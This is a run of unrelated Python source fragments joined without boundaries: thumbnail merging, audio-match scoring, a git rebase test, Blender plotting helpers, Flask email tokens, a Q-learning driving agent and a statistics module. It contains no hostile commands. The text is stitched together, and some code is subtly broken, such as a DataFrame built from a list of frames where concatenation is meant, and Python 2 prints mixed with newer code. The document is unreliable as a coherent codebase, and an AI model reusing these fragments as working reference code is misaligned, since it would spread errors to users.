(folder: str) -> list(str) """ fnames = [] for root, dirs, files in os.walk(folder): for f in files: ftype = mimetypes.guess_type(f) if ftype[0] in ThumbnailCache.SUPPORTED_TYPES: fnames.append(os.path.join(root,f)) return fnames @staticmethod def _merge_thumbnails(fnames): """_merge_thumbnails(fnames: list(str)) -> QImage Generates a single image formed by all the images in the fnames list. """ from PyQt4 import QtCore, QtGui height = 0 width = 0 pixmaps = [] # OS may return wrong order so we need to sort fnames.sort() for fname in fnames: pix = QtGui.QPixmap(fname) if pix.height() > 0 and pix.width() > 0: pixmaps.append(pix) #width += pix.width() #height = max(height, pix.height()) height += pix.height() width = max(width,pix.width()) if len(pixmaps) > 0 and height > 0 and width > 0: finalImage = QtGui.QImage(width, height, QtGui.QImage.Format_ARGB32) painter = QtGui.QPainter(finalImage) x = 0 for pix in pixmaps: painter.drawPixmap(0, x, pix) x += pix.height() painter.end() if width > ThumbnailCache.IMAGE_MAX_WIDTH: finalImage = finalImage.scaledToWidth(ThumbnailCache.IMAGE_MAX_WIDTH, QtCore.Qt.SmoothTransformation) else: finalImage = None return finalImage def _save_thumbnail(self, pngimage, fname): """_save_thumbnail(pngimage:QImage, fname: str) -> str Returns the absolute path of the saved image """ png_fname = os.path.join(self.get_directory(), fname) if os.path.exists(png_fname): os.unlink(png_fname) pngimage.save(png_fname) return png_fname def _copy_thumbnails(self, thumbnails): """_copy_thumbnails(thumbnails: list of str) -> None """ local_dir = self.get_directory() for thumb in thumbnails: local_thumb = os.path.join(local_dir, os.path.basename(thumb)) if os.path.exists(thumb) and not os.path.exists(local_thumb): shutil.copyfile(thumb, local_thumb) jean-andre-gauthier/findsong1-10 """ Iterates over match info files produced by get_matches_for_globs.py, and extracts the respective recognition rates """ from argparse import ArgumentParser from os import path import re import subprocess import sys def main(): parser = ArgumentParser() parser.add_argument( "--matchesfilepath", help="matches input file (path)", required=True, type=str) parser.add_argument( "--recognitionrateformatchesfilepath", help="recrate output file (path)", required=True, type=str) parser.add_argument( "--wrongresultsformatchesfilepath", help="wrong matches output file (path)", required=True, type=str) args = parser.parse_args() if not path.exists(args.matchesfilepath): print(f"Error: {args.matchesfilepath} does not exist") sys.exit(1) if path.exists(args.recognitionrateformatchesfilepath): print( f"Error: {args.recognitionrateformatchesfilepath} already exists") sys.exit(1) if path.exists(args.wrongresultsformatchesfilepath): print(f"Error: {args.wrongresultsformatchesfilepath} already exists") sys.exit(1) with open(args.matchesfilepath) as matches_file, open( args.recognitionrateformatchesfilepath, "w") as recrate_for_matches_file, open( args.wrongresultsformatchesfilepath, "w") as wrong_results_for_matches_file: path_regex = (r"workspace/scala/findsong/analyses/data/clips/" + r"audio_filters/(.*)/(.*)") metadata_artist_title_regex = ( r"^format\|tag:artist=(.*)\|" + r"tag:title=(.*)$") metadata_title_artist_regex = ( r"^format\|tag:title=(.*)\|" + "tag:artist=(.*)$") n_matches_by_path_suffix = {} score_by_path_suffix = {} wrong_results_by_path_suffix = {} for match_info in matches_file.readlines(): match_info_list = match_info.split(";") if len(match_info_list) != 11: print(f"Error: unexpected match_info_list 
{match_info_list}") sys.exit(1) (clip_filename, clip_matcher_duration, clip_score1, _, clip_title_artist1, clip_score2, _, clip_title_artist2, clip_score3, _, clip_title_artist3) = (match_info_list) clip_path_match = re.search(path_regex, clip_filename) path_suffix = clip_path_match.group(1) metadata = subprocess.run( [ "ffprobe", "-show_entries", "format_tags=artist,title", "-of", "compact", clip_filename ], stdout=subprocess.PIPE) decoded_metadata = metadata.stdout.decode("utf-8") metadata_artist_title_match = re.search( metadata_artist_title_regex, decoded_metadata, flags=re.MULTILINE) metadata_title_artist_match = re.search( metadata_title_artist_regex, decoded_metadata, flags=re.MULTILINE) if metadata_artist_title_match or metadata_title_artist_match: (metadata_artist, metadata_title) = (metadata_artist_title_match.group(1), metadata_artist_title_match.group(2) ) if metadata_artist_title_match else ( metadata_title_artist_match.group(2), metadata_title_artist_match.group(1)) if (metadata_title + " - " + metadata_artist == clip_title_artist1): n_matches_by_path_suffix[path_suffix] = ( n_matches_by_path_suffix.get(path_suffix, 0) + 1) score_by_path_suffix[path_suffix] = ( score_by_path_suffix.get(path_suffix, 0) + int(clip_score1)) else: wrong_results_by_path_suffix[path_suffix] = ( wrong_results_by_path_suffix.get(path_suffix, []) + [metadata_title + " - " + metadata_artist]) for (path_suffix, n_matches) in n_matches_by_path_suffix.items(): print( " ".join([ path_suffix, str(n_matches), str(score_by_path_suffix[path_suffix]) ]), file=recrate_for_matches_file) path_suffix_wrong_results_list = [] for (path_suffix, wrong_results) in wrong_results_by_path_suffix.items(): wrong_results.sort() path_suffix_wrong_results_list.append( [path_suffix, ";".join(wrong_results)]) path_suffix_wrong_results_list.sort() for path_suffix_wrong_results in path_suffix_wrong_results_list: print( " ".join(str(entry) for entry in path_suffix_wrong_results), file=wrong_results_for_matches_file) if __name__ == "__main__": main() # System imports import os from os.path import join from git import * from nose.tools import * from PyGitUp.git_wrapper import RebaseError from PyGitUp.tests import basepath, write_file, init_master, update_file, testfile_name test_name = 'rebase_error' repo_path = join(basepath, test_name + os.sep) def setup(): master_path, master = init_master(test_name) # Prepare master repo master.git.checkout(b=test_name) # Clone to test repo path = join(basepath, test_name) master.clone(path, b=test_name) repo = Repo(path, odbt=GitCmdObjectDB) assert repo.working_dir == path # Modify file in master update_file(master, test_name) # Modify file in our repo contents = 'completely changed!' 
repo_file = join(path, testfile_name) write_file(repo_file, contents) repo.index.add([repo_file]) repo.index.commit(test_name) # Modify file in master update_file(master, test_name) @raises(RebaseError) def test_rebase_error(): """ Run 'git up' with a failing rebase """ os.chdir(repo_path) from PyGitUp.gitup import GitUp gitup = GitUp(testing=True) gitup.run() #!/usr/bin/python3 import hashlib import os import shutil import subprocess import tempfile import matplotlib as mpl import matplotlib.cm import numpy as np from blender import * import bmesh import bpy def addSphere(loc, size, accuracy=8): bpy.ops.mesh.primitive_uv_sphere_add( segments=2*accuracy, ring_count=accuracy, location=loc, size=size) return getNewObject() def addCylinder(loc, size, rot): bpy.ops.mesh.primitive_cylinder_add( vertices=256, location=loc, radius=size[0], depth=size[1], rotation=rot) return getNewObject() def addCircle(loc, size, rot): bpy.ops.curve.primitive_nurbs_circle_add( location=loc, radius=size, rotation=rot) return getNewObject() def addGrid(loc, size, rot, nn): bpy.ops.mesh.primitive_grid_add( location=loc, radius=size, rotation=rot, x_subdivisions=nn[0], y_subdivisions=nn[1]) return getNewObject() def normalizePoints(*args): return [np.array(xx) for xx in np.broadcast_arrays(*args)] def loadImageTexture(obj, path): image = bpy.data.images.load(path) texture = bpy.data.textures.new("Texture", type="IMAGE") texture.image = image texture.filter_type = "BOX" slot = obj.active_material.texture_slots.add() slot.texture = texture slot.texture_coords = "ORCO" return slot def addPlotLine(loc, xx, yy, zz, lw=0.05, addAsShapeKeyTo=None): xx, yy, zz = normalizePoints(xx, yy, zz) scene = bpy.context.scene curve = bpy.data.curves.new("Curve", "CURVE") obj = bpy.data.objects.new("Curve Object", curve) scene.objects.link(obj) scene.objects.active = obj curve.dimensions = "3D" spline = curve.splines.new("POLY") spline.points.add(len(xx) - 1) for point, x, y, z in zip(spline.points, xx, yy, zz): point.co = (loc[0]+x, loc[1]+y, loc[2]+z, 1) circle = addCircle(loc, lw, rad(0, 0, 0)) obj.data.bevel_object = circle obj.data.use_fill_caps = True mat = bpy.data.materials.new(name="Material") obj.data.materials.append(mat) shapeKey = obj.shape_key_add("Shape Key") obj.data.shape_keys.use_relative = False #mesh = objCurve.to_mesh(scene, False, "PREVIEW") #obj = bpy.data.objects.new("Mesh Object", mesh) #scene.objects.link(obj) #obj.matrix_world = objCurve.matrix_world #mat = bpy.data.materials.new(name="Material") #obj.data.materials.append(mat) #scene.objects.unlink(objCurve) #scene.objects.unlink(circle) #return obj return obj def addPlotLineAsShapeKey(loc, xx, yy, zz, obj): xx, yy, zz = normalizePoints(xx, yy, zz) shapeKey = obj.shape_key_add("Shape Key") for point, x, y, z in zip(shapeKey.data, xx, yy, zz): point.co = (loc[0]+x, loc[1]+y, loc[2]+z) return obj def addPlotSurface(loc, XX, YY, ZZ): XX, YY, ZZ = normalizePoints(XX, YY, ZZ) nn = XX.shape[::-1] obj = addGrid(loc, 1, rad(0, 0, 0), nn) for j in range(nn[0]): for i in range(nn[1]): obj.data.vertices[i+j*nn[0]].co = (XX[i,j], YY[i,j], ZZ[i,j]) slot = loadImageTexture(obj, getInPath("colorbar.png")) slot.mapping_x = "NONE" slot.mapping_y = "Z" slot.mapping_z = "NONE" obj.active_material.specular_intensity = 0.1 shapeKey = obj.shape_key_add("Shape Key") obj.data.shape_keys.use_relative = False return obj def addPlotSurfaceAsShapeKey(loc, XX, YY, ZZ, obj): XX, YY, ZZ = normalizePoints(XX, YY, ZZ) nn = XX.shape[::-1] shapeKey = obj.shape_key_add("Shape Key") for j in 
range(nn[0]): for i in range(nn[1]): shapeKey.data[i+j*nn[0]].co = (XX[i,j], YY[i,j], ZZ[i,j]) return obj def addPlotPoints(loc, ms, X): X = np.array(X) if X.shape[1] == 2: X = np.append(X, np.zeros((X.shape[0],)), axis=1) objs = [addSphere(x, ms) for x in X] return addParent(loc, objs) def addLogo(loc, n=2): r = 1 size, rot = (1, 0.2), rad(90, 0, 0) objs = [] pngNames = { (0, 0) : "circleBSpline.png", (1, 0) : "circleTopoOpt.png", (1, 1) : "circleBiomech.png", (1, 2) : "circleAlgorithm.png", (1, 3) : "circleSparseGrid.png", (1, 4) : "circleProof.png", (1, 5) : "circleFinance.png", } for i in range(n): phi = np.linspace(0, 2*np.pi, 7) corners = i*2*r * np.array([np.cos(phi), 7*[0], np.sin(phi)]).T for j in np.linspace(0, 6, max(6*i+1,2))[:-1]: k, t = int(j), j % 1 obj = addCylinder((1-t)*corners[k] + t*corners[k+1], size, rot) objs.append(obj) obj.active_material.diffuse_color = getColor("mittelblau") if i <= 1: loadImageTexture(obj, getInPath(pngNames[(i, j)])) return addParent(loc, objs) def roundCorners(obj, radius, corners=None): if corners is False: return if corners is not None: corners = [ {"nw" : 2, "ne" : 3, "sw" : 0, "se" : 1}.get(x, x) for x in corners ] vertexGroup = obj.vertex_groups.new(name="Vertex Group") vertexGroup.add(corners, 1, "ADD") modifier = obj.modifiers.new("Bevel", "BEVEL") modifier.width = radius modifier.segments = 128 modifier.use_only_vertices = True if corners is not None: modifier.limit_method = "VGROUP" modifier.vertex_group = vertexGroup.name #bpy.ops.object.modifier_apply(apply_as="DATA", modifier=modifier.name) def addRectangleHUD(loc, size, roundedCorners=None, rcRadius=0.1, color="hellblau"): bpy.ops.mesh.primitive_plane_add(location=loc) obj = bpy.context.object camera = bpy.context.scene.camera obj.scale = (size[0]/2, size[1]/2, 0) bpy.ops.object.transform_apply(scale=True) obj.location = (loc[0]+size[0]/2, loc[1]-size[1]/2, -loc[2]-0.01) obj.parent = camera constraint = obj.constraints.new("COPY_ROTATION") constraint.target = camera mat = bpy.data.materials.new(name="Material") mat.diffuse_color = getColor(color) mat.use_shadeless = True obj.data.materials.append(mat) roundCorners(obj, rcRadius, corners=roundedCorners) return obj def addCircleHUD(loc, size, color="hellblau"): return addRectangleHUD(loc, [size, size], rcRadius=size, color=color) def addPolygonHUD(loc, vertices, roundedCorners=None, rcRadius=0.1, color="hellblau"): n = len(vertices) mesh = bpy.data.meshes.new("Mesh") bMesh = bmesh.new() vertices = [bMesh.verts.new(vertex) for vertex in vertices] edges = [bMesh.edges.new([vertices[i], vertices[(i+1)%n]]) for i in range(n)] face = bMesh.faces.new(vertices) bMesh.to_mesh(mesh) bMesh.free() obj = bpy.data.objects.new("Polygon", mesh) bpy.context.scene.objects.link(obj) camera = bpy.context.scene.camera obj.location = (loc[0], loc[1], -loc[2]-0.01) obj.parent = camera constraint = obj.constraints.new("COPY_ROTATION") constraint.target = camera mat = bpy.data.materials.new(name="Material") mat.diffuse_color = getColor(color) mat.use_shadeless = True obj.data.materials.append(mat) roundCorners(obj, rcRadius, corners=roundedCorners) return obj def addLaTeX(loc, rot, text, scale=1.0, textWidth=r"\textwidth", color="black", contourColor=None): tex = r""" \documentclass{article} % language and encodings \usepackage[ngerman,american]{babel} % amsmath with improvements \usepackage{mathtools} % need T1 font encoding for Charter, % otherwise there will be "undefined font shape" warnings \usepackage[T1]{fontenc} % use Bitstream Charter as main font 
\usepackage[bitstream-charter]{mathdesign} % colors \usepackage{xcolor} % contours \usepackage{contour} % use display style by default (undo with \textstyle) \everymath{\displaystyle} % automatically replace "l" with \ell in math mode \makeatletter \mathcode`l="8000 \begingroup \lccode`\~=`\l \DeclareMathSymbol{\lsb@l}{\mathalpha}{letters}{`l} \lowercase{\gdef~{\ifnum\the\mathgroup=\m@ne \ell \else \lsb@l \fi}}% \endgroup \makeatother % define line colors (mix between MATLAB and matplotlib colors) \definecolor{C0}{rgb}{0.000,0.447,0.741} \definecolor{C1}{rgb}{0.850,0.325,0.098} \definecolor{C2}{rgb}{0.749,0.561,0.102} \definecolor{C3}{rgb}{0.494,0.184,0.556} \definecolor{C4}{rgb}{0.466,0.674,0.188} \definecolor{C5}{rgb}{0.301,0.745,0.933} \definecolor{C6}{rgb}{0.635,0.078,0.184} \definecolor{C7}{rgb}{0.887,0.465,0.758} \definecolor{C8}{rgb}{0.496,0.496,0.496} % define university CD colors \definecolor{anthrazit}{RGB}{62,68,76} \definecolor{mittelblau}{RGB}{0,81,158} \definecolor{hellblau}{RGB}{0,190,255} % omit page number \pagestyle{empty} \begin{document} \begin{minipage}{""" + textWidth + r"""} % don't justify text, set hyphenation penalty to zero \raggedright \hyphenpenalty=0 """ + ((r"\contour{" + contourColor + r"}{" + text + r"}") if contourColor is not None else text) + r""" \end{minipage}% \end{document} """ texHash = hashlib.sha512(tex.encode()).hexdigest() tmpName = "latex-{}.svg".format(texHash[:8]) tmpPath, tmpExists = useTmpFile(tmpName) if not tmpExists: with tempfile.TemporaryDirectory() as dir_: texPath = os.path.join(dir_, "temp.tex") with open(texPath, "w") as f: f.write(tex) subprocess.run(["lualatex", "temp.tex"], check=True, cwd=dir_) pdfPath = os.path.join(dir_, "temp.pdf") svgPath = os.path.join(dir_, "temp.svg") subprocess.run(["pdftocairo", "-svg", pdfPath, svgPath], check=True) subprocess.run( ["inkscape", "--without-gui", "-f", svgPath, "-D", "-l", svgPath], check=True) shutil.copy(svgPath, tmpPath) objs = bpy.data.objects[:] bpy.ops.import_curve.svg(filepath=tmpPath) objs = [obj for obj in bpy.data.objects if obj not in objs] for i, child in enumerate(objs): mat = bpy.data.materials.new(name="Material") if contourColor is None: curColor = color else: numberOfCopies = 16 if i < numberOfCopies * len(objs) / (numberOfCopies + 1): curColor = contourColor child.location = (*child.location[:2], child.location[2] - 1e-6) else: curColor = color mat.diffuse_color = getColor(curColor) child.data.materials[0] = mat obj = addParent(loc, objs) obj.scale = 3*[scale*100] obj.rotation_euler = rot return obj def addLaTeXHUD(loc, text, **kwargs): obj = addLaTeX(loc, rad(0, 0, 0), text, **kwargs) camera = bpy.context.scene.camera #direction = -camera.matrix_world.to_3x3().transposed()[2].normalized() #loc = (distance * direction)[:] obj.location = (loc[0], loc[1], -loc[2]) obj.parent = camera constraint = obj.constraints.new("COPY_ROTATION") constraint.target = camera for child in obj.children: mat = child.active_material mat.use_shadeless = True return obj api/users/emailtoken.py from itsdangerous import URLSafeTimedSerializer from flask_mail import Message from ..mail import mail from flask import render_template import os from ..config import DevConfig class Token: def __init__(self, cfg=DevConfig): self.key = cfg.SECRET_KEY self.passw = os.environ.get('SECURITY_PASSWORD_SALT') self.sender = cfg.MAIL_DEFAULT_SENDER def generate_confirmation_token(self, email): serializer = URLSafeTimedSerializer(self.key) return serializer.dumps(email, salt=self.passw) def confirm_token(self, 
token, expiration=3600): serializer = URLSafeTimedSerializer(self.key) try: email = serializer.loads( token, salt=self.passw, max_age=expiration ) except: return False else: return email class Email(Token): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def send_email(self, to, subject, template): msg = Message( subject, recipients=[to], html=template, sender=self.sender ) mail.send(msg) return "Message sent"from django.shortcuts import render from . import models from . import serializers from rest_framework import viewsets, status, mixins, generics class ContactReqViewSet(viewsets.ModelViewSet): """Manage contact requests in the database""" serializer_class = serializers.ContactReqSerializer queryset = models.ContactRequest.objects.all() import random import math from environment import Agent, Environment from planner import RoutePlanner from simulator import Simulator from collections import defaultdict import numpy as np import matplotlib.pyplot as plt import time import pandas as pd class LearningAgent(Agent): """An agent that learns to drive in the smartcab world.""" def __init__(self, env): super(LearningAgent, self).__init__( env) # sets self.env = env, state = None, next_waypoint = None, and a default color self.color = 'red' # override color self.planner = RoutePlanner(self.env, self) # simple route planner to get next_waypoint # TODO: Initialize any additional variables here self.counter = 0 self.gamma = 0.4 self.epsilon = 0.05 self.powert = 1 self.previous_state = None self.previous_action = None self.q = defaultdict(dict) self.score = 0 self.penalties = 0 self.counter = 0 self.df = self.df = pd.DataFrame(columns=('inputs', 'waypoint', 'action')) def reset(self, destination=None): self.planner.route_to(destination) # TODO: Prepare for a new trip; reset any variables here, if required self.previous_state = None self.previous_action = None self.score = 0 self.penalties = 0 self.counter += 1 def update(self, t): # Gather inputs self.next_waypoint = self.planner.next_waypoint() # from route planner, also displayed by simulator inputs = self.env.sense(self) # TODO: Select action according to your policy alpha = float(1) / (t**self.powert + 1) # TODO: Update state self.state = (self.next_waypoint, inputs['light'], inputs['oncoming'], inputs['right'], inputs['left']) action = take_action(self, self.state) reward = self.env.act(self, action) # TODO: Learn policy based on state, action, reward qsa = self.q[self.previous_state][self.previous_action] if self.previous_action in self.q[self.previous_state] else 0 qsa_prime = self.q[self.state][action] if action in self.q[self.state] else 0 self.q[self.state][action] = (1 - alpha) * qsa + alpha * (reward + self.gamma * qsa_prime) # print "deadline = {}, inputs = {}, action = {}, reward = {}".format(deadline, inputs, action, reward) # [debug] # TODO: update previous state and action self.previous_action = action self.previous_state = self.state # for statistics self.score += reward self.penalties += reward if reward < 0 else 0 # Add a row with current state, waypoint and action to dataframe if self.counter == 100: self.df.loc[len(self.df)] = [inputs, self.next_waypoint, action] print (t, self.env.get_deadline(self), reward) # save DataFrame when done if self.counter == 100 and (reward >= 10 or t == self.env.get_deadline(self)): print "saving" self.df.to_csv("actions.csv") def take_action(self, state): # pick one self.env.get_deadline(self) self.epsilon -= self.epsilon / 1000 # arbitrarily decreasing # print 
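# --- Editor's note: a minimal usage sketch (not part of the original sources) for the
# --- Token/Email helpers defined in api/users/emailtoken.py above. It assumes a config
# --- exposing SECRET_KEY and MAIL_DEFAULT_SENDER and that SECURITY_PASSWORD_SALT is set
# --- in the environment, as DevConfig implies; the address below is illustrative only.
#
#     token_helper = Token()                       # uses DevConfig by default
#     token = token_helper.generate_confirmation_token("user@example.com")
#     # later, e.g. in a confirmation view: returns the email on success,
#     # or False if the signature is invalid or older than max_age (default 3600 s)
#     email = token_helper.confirm_token(token)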
self.epsilon if random.uniform(0, 1) <= self.epsilon: return random.choice(self.env.valid_actions) else: # find q values associated to each valid action. If no q value is found use 0 q_values = [self.q[state][a] if a in self.q[state] else 0 for a in self.env.valid_actions] # find the valid actions with highest q values best = [i for i in range(len(self.env.valid_actions)) if q_values[i] == max(q_values)] return self.env.valid_actions[random.choice(best)] def run(): """Run the agent for a finite number of trials.""" # Set up environment and agent e = Environment() # create environment (also adds some dummy traffic) a = e.create_agent(LearningAgent) # create agent e.set_primary_agent(a, enforce_deadline=True) # specify agent to track # NOTE: You can set enforce_deadline=False while debugging to allow longer trials # Now simulate it sim = Simulator(e, update_delay=0, display=False) # create simulator (uses pygame when display=True, if available) # NOTE: To speed up simulation, reduce update_delay and/or set display=False sim.run(n_trials=100) # run for a specified number of trials # NOTE: To quit midway, press Esc or close pygame window, or hit Ctrl+C on the command-line """Below is the code for the simulation discussed in the report. For this simulation to work the code of environment.py must be changed to keep the results """ # def run(): # """Run the agent for a finite number of trials.""" # import matplotlib.pyplot as plt # start_time = time.time() # df = pd.DataFrame(columns=('values', 'gamma', 'powert', 'epsilon', 'average_penalty_last_10', 'average_score_last_10', 'average_outcome_last_10', 'last_outcome')) # for gamma in [x * 0.05 for x in range(0, 11)]: # for epsilon in [x * 0.05 for x in range(0, 11)]: # for powert in range(1, 3): # n_instances = 11 # last_10_penalties = np.zeros((n_instances, 10)) # last_10_scores = np.zeros((n_instances, 10)) # last_10_outcomes = np.zeros((n_instances, 10)) # for val in range(0, n_instances): # # Set up environment and agent # e = Environment() # create environment (also adds some dummy traffic) # a = e.create_agent(LearningAgent) # create agent # a.gamma = gamma # a.powert = powert # a.epsilon = epsilon # e.set_primary_agent(a, enforce_deadline=True) # specify agent to track # # NOTE: You can set enforce_deadline=False while debugging to allow longer trials # # # Now simulate it # sim = Simulator(e, update_delay=0, # display=False) # create simulator (uses pygame when display=True, if available) # # NOTE: To speed up simulation, reduce update_delay and/or set display=False # # # # n = 100 # sim.run(n_trials=n) # run for a specified number of trials # # print sim.env.results # indexes = np.array(range(0, n)) # scores = np.array([x[1] for x in sim.env.results]) # penalties = np.array([x[2] for x in sim.env.results]) # outcomes = np.array([x[0] for x in sim.env.results]) # last_10_penalties[val] = penalties[-10:] # last_10_scores[val] = scores[-10:] # last_10_outcomes[val] = outcomes[-10:] # # # #averaging # apenalty = np.average(np.average(last_10_penalties, axis=0), axis=0) # ascore = np.average(np.average(last_10_scores, axis=0), axis=0) # aoutcome = np.average(np.average(last_10_outcomes, axis=0), axis=0) # values = "Eps:{:.2f} Gamma:{:.2f} PowT:{:d}".format(epsilon, gamma, powert) # print values # print [values, gamma, powert, epsilon, apenalty, ascore, aoutcome] # df.loc[len(df)] = [values, gamma, powert, epsilon, apenalty, ascore, aoutcome, last_10_outcomes[9]] # df.to_csv("results.csv") # elapsed_time = time.time() - start_time # print 
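# --- Editor's note: a self-contained sketch (added for clarity; not from the smartcab
# --- repo) of the two mechanisms LearningAgent uses above: epsilon-greedy selection
# --- over a dict-of-dicts Q table, and the tabular update
# --- Q(s, a) <- (1 - alpha) * Q(s, a) + alpha * (reward + gamma * Q(s', a')).
# --- All names and numbers below are illustrative.
import random
from collections import defaultdict

def epsilon_greedy(q, state, actions, epsilon):
    """With probability epsilon explore; otherwise pick one of the best-known actions."""
    if random.uniform(0, 1) <= epsilon:
        return random.choice(actions)
    q_values = [q[state].get(a, 0) for a in actions]
    best = [a for a, v in zip(actions, q_values) if v == max(q_values)]
    return random.choice(best)

def q_update(q, state, action, reward, next_state, next_action, alpha, gamma):
    """One tabular update of the same form as LearningAgent.update()."""
    qsa = q[state].get(action, 0)
    qsa_next = q[next_state].get(next_action, 0)
    q[state][action] = (1 - alpha) * qsa + alpha * (reward + gamma * qsa_next)

# Example: one step using the smartcab's valid actions.
_q = defaultdict(dict)
_actions = [None, 'forward', 'left', 'right']
_a = epsilon_greedy(_q, 'state-0', _actions, epsilon=0.05)
q_update(_q, 'state-0', _a, reward=2.0, next_state='state-1', next_action=_a,
         alpha=0.5, gamma=0.4)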
"Simulation took {} seconds".format(elapsed_time) # NOTE: To quit midway, press Esc or close pygame window, or hit Ctrl+C on the command-line if __name__ == '__main__': run() JFLandrigan/eagleseagles/Exploratory/outcomes.py0 from eagles.Exploratory.utils import plot_utils as pu import pandas as pd import numpy as np from sklearn.preprocessing import StandardScaler, MinMaxScaler import statsmodels.api as sm import logging from IPython.display import display logger = logging.getLogger(__name__) pd.set_option("display.max_rows", None) pd.set_option("display.max_columns", None) pd.set_option("display.width", None) pd.set_option("display.max_colwidth", None) def _perform_regress( data: pd.DataFrame = None, outcome_type: str = None, outcome: str = None, fts: list = None, disp: bool = True, ) -> pd.DataFrame: # todo Should also add in regression plots to show the fits # set model based on binary or not tmp_data = data.copy(deep=True) tmp_data.dropna(subset=[outcome] + fts, axis=0, inplace=True) if outcome_type == "categorical": tmp_data[outcome] = tmp_data[outcome].astype(int) est = sm.Logit(tmp_data[outcome], tmp_data[fts]) est2 = est.fit(method="bfgs") else: est = sm.OLS(tmp_data[outcome], tmp_data[fts]) est2 = est.fit() results_summary = est2.summary() res = results_summary.tables[1] res = pd.read_html(res.as_html(), header=0, index_col=0)[0].reset_index() res.rename(columns={"index": "feature"}, inplace=True) if disp: display(res) return res def _get_proportions_by_outcomes( data: pd.DataFrame = None, outcome: str = None, categorical_fts: list = [], disp: bool = True, plot: bool = False, ) -> pd.DataFrame: cat_df = pd.DataFrame() for ft in categorical_fts: grp_df = data.groupby(ft, as_index=False)[outcome].agg("count") grp_df["proportion_samples"] = round((grp_df[outcome] / len(data)) * 100, 2) grp_df[ft] = list(map(lambda x: ft + "_" + str(x), grp_df[ft])) grp_df.columns = ["feature", "count", "proportion_samples"] cat_df = pd.DataFrame([cat_df, grp_df]) if disp: display(cat_df) if plot: pu.plot_proportions_by_outcome(data=data, outcome=outcome, fts=categorical_fts) return cat_df def _get_corr_to_outcome( data: pd.DataFrame = None, outcome: str = None, continuous_fts: list = [], disp: bool = True, plot: bool = False, ) -> pd.DataFrame: corrs = np.array([]) for ft in continuous_fts: corrs = np.append(corrs, data[[outcome, ft]].corr().iloc[0, 1]) corr_df = pd.DataFrame( { "outcome": np.repeat(outcome, len(continuous_fts)), "feature": continuous_fts, "correlation": corrs, } ) if disp: display(corr_df) return corr_df def _get_descriptives_by_outcome( data: pd.DataFrame = None, outcome: list = [], continuous_fts: list = [], descriptive_stats: list = [], disp: bool = True, plot: bool = False, ) -> pd.DataFrame: if len(descriptive_stats) == 0: descriptive_stats = ["mean", "median", "std", "min", "max"] grp_df = data.groupby(outcome, as_index=False)[continuous_fts].agg( descriptive_stats ) col_names = [stat + "_" + ft for ft in continuous_fts for stat in descriptive_stats] col_names = outcome + col_names grp_df.reset_index(inplace=True) grp_df.columns = col_names if disp: display(grp_df) if plot: pu.plot_outcome_boxes(data=data, outcome=outcome, fts=continuous_fts) return grp_df def stats_by_outcome( data: pd.DataFrame = None, outcome_type: str = "categorical", outcome: str = None, categorical_fts: list = [], continuous_fts: list = [], analyses: list = [], descriptive_stats: list = [], scale: str = None, disp: bool = True, # remove_outliers: bool = False, plot: bool = False, ) -> dict: """ :param 
data: expects pandas dataframe :param outcome_type: str type of outcome (i.e. categorical or continuous) :param outcome: str name of column containing the outcome :param continuous_fts: list of strings corresponding to column names of continuous features :param categorical_fts: list of strings corresponding to column names of categorical features :param analyses: list of desired analyses, options include descriptives (i.e. returns mean, median, max, min, std), proportions (i.e. proportion comparisons for categorical features), regress (i.e. returns significant predictors of the outcomes by performing regression using the features as predictors) :param scale: string indicating whether or not to scale the data. Expects either "standard" or "minmax" :param disp: default True, boolean indicator to display result dataframes :param plot: Boolean, default False. IF true plots are displayed :return: dictionary containing analyse keyed and result dataframe value pairs """ if outcome is None: logger.warning("No outcome passed in") return None analyses_dict = {} fts = categorical_fts + continuous_fts # if scale then scale the continuous features if scale: if scale == "standard": scaler = StandardScaler() elif scale == "minmax": scaler = MinMaxScaler() else: logger.warning("Scaler not supported") return None data[continuous_fts] = scaler.fit_transform(data[continuous_fts]) if len(analyses) == 0: analyses = ["descriptives", "proportions", "regress"] for a in analyses: # get the base descriptives for the continuous features by outcome if a == "descriptives": if outcome_type == "categorical": desc_df = _get_descriptives_by_outcome( data=data, outcome=[outcome], continuous_fts=continuous_fts, descriptive_stats=descriptive_stats, disp=disp, plot=plot, ) analyses_dict["descriptives"] = desc_df else: corr_df = _get_corr_to_outcome( data=data, outcome=outcome, continuous_fts=continuous_fts, disp=disp, plot=plot, ) analyses_dict["correlations"] = corr_df desc_df = _get_descriptives_by_outcome( data=data, outcome=categorical_fts, continuous_fts=[outcome], descriptive_stats=descriptive_stats, disp=disp, plot=plot, ) analyses_dict["desc_df"] = desc_df # get the proportion labels for categorical features by outcome elif a == "proportions" and len(categorical_fts) > 0: prop_df = _get_proportions_by_outcomes( data=data, outcome=outcome, categorical_fts=categorical_fts, disp=disp, plot=plot, ) analyses_dict["proportions"] = prop_df elif a == "regress": sig_df = _perform_regress( data=data, outcome=outcome, fts=fts, outcome_type=outcome_type, disp=disp, ) analyses_dict["regress"] = sig_df else: logger.warning(a + " not supported") return analyses_dict libcloud/common/base.py # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
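# --- Editor's note: a minimal usage sketch (added; not from the eagles sources) for
# --- stats_by_outcome() documented above. The dataframe and column names are invented
# --- for illustration; the keyword arguments follow the signature in outcomes.py.
#
#     import pandas as pd
#     from eagles.Exploratory.outcomes import stats_by_outcome
#
#     df = pd.DataFrame({
#         "churned": [0, 1, 0, 1],                    # categorical outcome
#         "plan": ["a", "b", "a", "b"],               # categorical feature
#         "monthly_spend": [10.0, 42.5, 8.0, 55.0],   # continuous feature
#     })
#     results = stats_by_outcome(
#         data=df, outcome_type="categorical", outcome="churned",
#         categorical_fts=["plan"], continuous_fts=["monthly_spend"],
#         analyses=["descriptives", "proportions"], scale="standard", disp=False,
#     )
#     # results is a dict keyed by analysis name ("descriptives", "proportions", ...)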
